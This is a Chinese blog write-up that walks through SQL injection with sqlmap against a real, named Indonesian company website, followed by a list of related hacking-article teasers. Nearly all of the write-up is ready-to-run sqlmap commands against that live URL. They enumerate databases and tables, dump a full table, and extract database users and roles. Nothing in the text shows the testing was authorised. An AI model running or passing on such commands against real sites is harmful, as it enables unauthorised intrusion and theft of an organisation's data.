write up::web 实战2-注入 --sqlmap注入版
0x00根据注入点爆出数据库
sqlmap -u http://www.kabelindo.co.id/readnews.php?id=28 --dbs
0x01根据数据库爆出表名
sqlmap -u http://www.kabelindo.co.id/readnews.php?id=28 --tables -D u9897uwx_kabel
0x02练点其他的
1.查找某张表的字段信息
比如这里查找最后一张表(tbnomax)的字段信息
sqlmap -u http://www.kabelindo.co.id/readnews.php?id=28 --columns -T tbnomax
2.提取整个表的具体内容
sqlmap -u http://www.kabelindo.co.id/readnews.php?id=28 --dump -T tbnomax
3.敏感字段进行16进制编码
sqlmap -u http://www.kabelindo.co.id/readnews.php?id=28 --columns -T tbnomax --hex
4.查找用户
sqlmap -u http://www.kabelindo.co.id/readnews.php?id=28 --users
5.提取所有信息
sqlmap -u http://www.kabelindo.co.id/readnews.php?id=28 -a
6.查看用户角色信息
sqlmap -u http://www.kabelindo.co.id/readnews.php?id=28 --roles
end~
write up::web 实战2-注入 --sqlmap注入版相关推荐
- 黑客攻防技术宝典:Web实战篇(第2版)与第1版的区别
第1版出版4年以来,许多事情发生了改变,而许多事情仍保持原状.当然,新技术继续高速发展,这引发了各种新型漏洞和攻击.同时,黑客们还开发出了新的攻击技术,设计了利用旧有漏洞的新方法.但是,这些技术或人为 ...
- write up:web 实战2-注入--sql注入(手工注入详细版)
0x00查找注入点 我是通过展开html标签来找注入点的 注入点 www.kabelindo.co.id/readnews.php?id=28 下面开始盘它!!! 0x01 手动注入 先确定字段数目 ...
- SQL注入攻击及防御 手动注入+sqlmap自动化注入实战(网络安全学习12)
CONTENTS 1 项目实验环境 2 SQL注入概述 2.1 SQL注入简介 2.2 SQL注入的危害 3 SQL基础回顾 3.1 联合查询union 3.2 information_schema数 ...
- 【Web安全】关于SQL注入简介以及使用SqlMap获取管理员密码的探索
上次用Burp抓包本地dami框架成功 附上截图: 文章目录 1 SQL注入漏洞简介 1.1 SQL注入点的类型 1.2 SQL注入之注入点的寻找 2 SqlMap 3 SqlMap注入基本流程 4 ...
- 利用sqlmap注入获取网址管理员账号密码
1.跨站脚本 原理:指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料.利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式. ( ...
- Web安全渗透学习-SQL注入
SQL注入攻击 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令.具体来说,它是利用现有应用程序,将(恶意的)SQL命令 ...
- Web渗透测试对靶机注入shell(phpMyAdmin)
Web渗透测试对靶机注入shell 文章目录 Web渗透测试对靶机注入shell 1.寻找目标信息 netdiscover扫描 nmap扫描 利用御剑后台进行扫描 2.对登录页面进行暴力破解 启动bu ...
- 【渗透工具】-SQL注入-SQLMap项目梳理
文章目录 概述8个目录文件 详细说明4个重点目录 软件说明doc 插件库plugins 绕过脚本tamper data数据目录 使用说明 查看软件信息 和 General 基础用法 -h 1.Targ ...
- web漏洞开始,sql注入
第十一天,web漏洞必懂知识点 这个图里面,右边的漏洞比左边的漏洞相对重要,因为在实战过程中,左边所产生的漏洞就比较少,我们学习网络安全呢就要做到他们的这些原理和危害. 比如sql注入漏洞是网站数据库 ...
最新文章
- 2018-4-15狼群算法以及改进的总结
- 在AI Studio上部署外部可以直接调用的云端服务
- oracle指定用户SID,如何修改oracle SID
- 第1次作业:谈谈我的看法与感想
- c#中 uint--byte[]--char[]--string相互转换汇总
- Linux Vim多窗口编辑,Vim打开多个窗口方法详解
- 监听Hierachy、Project等视图结构变化的事件
- 变更控制管理流程图_制度是最好的老板,流程就是最好的管理!流程建立法则(附案例)...
- foxmail地址簿怎么添加分组 foxmail地址簿新建分组的教程
- 数据库每日一题(易错)
- python数据参数_python 的参数总结
- Jmeter(四十七)_性能测试统计超时率
- 纯数学教程 Page 203 例XLI (2)
- 关于Oracle RAC基本概念
- Java基础(三):常用对象
- Vue开发环境的搭建
- Linux 下完整安装ffmpeg(包括各种解码器)
- Excel做的慢?学会这些Excel技巧和26个快捷键,让你效率翻十倍!
- 《计算广告》学习笔记(二)
- 用Python自动生成数据日报!
热门文章
- 学python编程_学习Python编程,我们应该如何学?学习内容包括哪些?
- 分组数据方差公式_统计学公式
- c语言野指针和空指针,C++中的空指针和野指针
- python api接口 安全_App开放接口api安全性的设计与实现
- Apache Flink 零基础入门(二):使用docker快速搭建Flink
- ubuntu 设置清华源、阿里云源
- struts2模型驱动和令牌拦截器
- 小白也能看懂的Pandas实操演示教程(上)
- go 打印bool_Golang语言基础教程:键盘输入和打印输出
- linux下数据库mysql命令大全_linux中mysql数据库操作命令大全有哪些